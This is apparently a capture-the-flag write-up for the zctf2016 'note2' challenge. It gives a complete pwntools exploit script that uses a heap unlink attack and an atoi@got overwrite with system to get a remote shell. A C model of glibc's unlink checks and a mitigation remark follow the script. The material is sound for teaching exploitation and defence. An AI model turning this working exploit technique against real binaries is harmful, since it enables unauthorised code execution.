zctf2016_note2

    Approach

    Use unlink to get a write into the ptr array that stores the note chunks, then change one chunk address to a GOT entry so the libc address can be leaked. Next, use the edit function to change atoi@got to the address of system; the program then calls atoi again on the menu input, so entering "/bin/sh\x00" executes system("/bin/sh") and gives a shell.

    Exploit

    from pwn import *

    #context.log_level = 'debug'

    #io = process('./note2')
    io = remote('node3.buuoj.cn',28019)
    elf = ELF('./note2')
    libc = ELF('./libc/libc-2.23.so')
    atoi_got = elf.got['atoi']

    # menu wrappers: 1 = new, 2 = show, 3 = edit, 4 = delete
    def new(size,content):
        io.recvuntil('option--->>')
        io.sendline('1')
        io.recvuntil('Input the length of the note content:(less than 128)')
        io.sendline(str(size))
        io.recvuntil('Input the note content:')
        io.sendline(content)

    def show(num):
        io.recvuntil('option--->>')
        io.sendline('2')
        io.recvuntil('Input the id of the note:')
        io.sendline(str(num))
        io.recvuntil('Content is ')
        content = io.recv()
        return content

    def edit(num,content,num1):
        # num1: 1 = overwrite, 2 = append
        io.recvuntil('option--->>')
        io.sendline('3')
        io.recvuntil('Input the id of the note:')
        io.sendline(str(num))
        io.recvuntil('do you want to overwrite or append?[1.overwrite/2.append]')
        io.sendline(str(num1))
        io.recvuntil('TheNewContents:')
        io.sendline(content)

    def delete(num):
        io.recvuntil('option--->>')
        io.sendline('4')
        io.recvuntil('Input the id of the note:')
        io.sendline(str(num))


    # address of the global array that holds the note chunk pointers
    heap_ptr_1=0x602120
    # fake free chunk stored in note 0: its size 0xa0 spans note 0 and note 1,
    # and fd/bk point just below heap_ptr_1 so that the allocator's
    # fd->bk == P / bk->fd == P check is satisfied
    fake_chunk = p64(0)+p64(0x81+0x20)
    fake_chunk += p64(heap_ptr_1 - 0x18) + p64(heap_ptr_1 - 0x10)
    fake_chunk += 'a'*0x10

    io.recvuntil('Input your name:')
    io.sendline('aaaa')
    io.recvuntil('Input your address:')
    io.sendline('1111')

    new(0x80,fake_chunk)   # note 0: 0x90 chunk carrying the fake chunk
    new(0,'')              # note 1: minimal 0x20 chunk
    new(0x80,'b'*0x20)     # note 2: 0x90 chunk that will be freed
    new(0x10,'c'*0x8)      # note 3: keeps note 2 from merging into top

    # overflow from note 1 into note 2's header: size byte 0x91 -> 0x90 (PREV_INUSE cleared)
    payload = 'd'*0x10 + 'd'*0x8 + p8(0x90)
    edit(1,payload,1)

    # each overwrite ends with a NUL, so shorten it one byte at a time
    # to zero note 2's prev_size field from its high byte down
    for i in range(7,-1,-1):
        payload = 'd'*0x10 + 'd'*i
        edit(1,payload,1)

    # prev_size = 0xa0 makes note 2 point back at the fake chunk
    payload = 'd'*0x10 + p64(0x20+0x80)
    edit(1,payload,1)

    # freeing note 2 consolidates backward and unlinks the fake chunk,
    # leaving ptr[0] = heap_ptr_1 - 0x18
    delete(2)

    # write through ptr[0] so that ptr[0] now holds atoi's GOT entry
    edit(0,'a'*0x18 + p64(atoi_got),1)

    # leak atoi and derive system from the libc offsets
    atoi_addr = u64(show(0)[0:6].ljust(8,'\x00'))
    print 'atoi_addr:'+ hex(atoi_addr)
    libc_base = atoi_addr - libc.sym['atoi']
    system_addr = libc_base + libc.sym['system']
    print 'system:'+hex(system_addr)

    # overwrite atoi@got with system
    io.sendline('3')
    io.sendlineafter('Input the id of the note:','0')
    io.sendlineafter('do you want to overwrite or append?[1.overwrite/2.append]','1')
    io.sendlineafter('TheNewContents:',p64(system_addr))

    # the menu passes this input to atoi(), which now resolves to system()
    io.sendlineafter('option--->>','/bin/sh\x00')

    io.interactive()
    
    
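To see the unlink step above from the allocator's side, here is an added C model (not code from the writeup or from glibc itself) of the consistency checks glibc's unlink() performs before it rewrites the list pointers; `unlink_check`, `build` and the demo functions are my own names, and the heap region is constructed. It shows which corruptions glibc 2.23 rejects, and that the size-vs-prev_size check added in 2.26 catches a chunk header whose size no longer agrees with the following chunk's prev_size.

```c
#include <stddef.h>
#include <string.h>

/* Minimal model of a 64-bit glibc malloc chunk header. */
typedef struct chunk {
    size_t prev_size, size;
    struct chunk *fd, *bk;
} chunk_t;

#define chunksize(p)  ((p)->size & ~(size_t)7)
#define next_chunk(p) ((chunk_t *)((char *)(p) + chunksize(p)))

enum { UNLINK_OK = 0, UNLINK_BAD_LIST = 1, UNLINK_BAD_SIZE = 2 };

/* Consistency checks glibc's unlink() runs before it writes FD->bk = BK and
 * BK->fd = FD. glibc 2.23 (the libc this writeup targets) has only the
 * fd/bk check; the size-vs-prev_size check was added in 2.26. */
int unlink_check(const chunk_t *p, int glibc_2_26_or_later)
{
    if (glibc_2_26_or_later && chunksize(p) != next_chunk(p)->prev_size)
        return UNLINK_BAD_SIZE;   /* "corrupted size vs. prev_size" */
    if (p->fd->bk != p || p->bk->fd != p)
        return UNLINK_BAD_LIST;   /* "corrupted double-linked list" */
    return UNLINK_OK;
}

/* Constructed heap region (not a real arena): free chunk `a` of `asize`
 * bytes at +0x40, followed by a chunk whose prev_size is `psize`. `a` is
 * linked into a one-node bin headed by `head`, unless bad_links is set,
 * in which case fd/bk point at an unrelated zeroed struct. */
static unsigned char arena[0x200];
static chunk_t head, stray;
static chunk_t *build(size_t asize, size_t psize, int bad_links)
{
    chunk_t *a = (chunk_t *)(arena + 0x40);
    memset(arena, 0, sizeof arena);
    memset(&head, 0, sizeof head);
    memset(&stray, 0, sizeof stray);
    a->size = asize | 1;                /* PREV_INUSE: chunk before it is allocated */
    next_chunk(a)->prev_size = psize;
    head.fd = head.bk = a;
    a->fd = a->bk = bad_links ? &stray : &head;
    return a;
}

int intact_list(void)        { return unlink_check(build(0x80, 0x80, 0), 1); } /* UNLINK_OK */
int garbage_pointers(void)   { return unlink_check(build(0x80, 0x80, 1), 1); } /* UNLINK_BAD_LIST */
int size_mismatch_2_23(void) { return unlink_check(build(0xa0, 0x80, 0), 0); } /* UNLINK_OK: not checked */
int size_mismatch_2_26(void) { return unlink_check(build(0xa0, 0x80, 0), 1); } /* UNLINK_BAD_SIZE */
```

The fd/bk check only verifies that both neighbours point back at the chunk, which is why a mismatched size is invisible to 2.23 and why Full RELRO (a read-only GOT) is the mitigation that would stop the atoi@got overwrite regardless of the heap state.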

Original article: https://www.cnblogs.com/luoleqi/p/13431944.html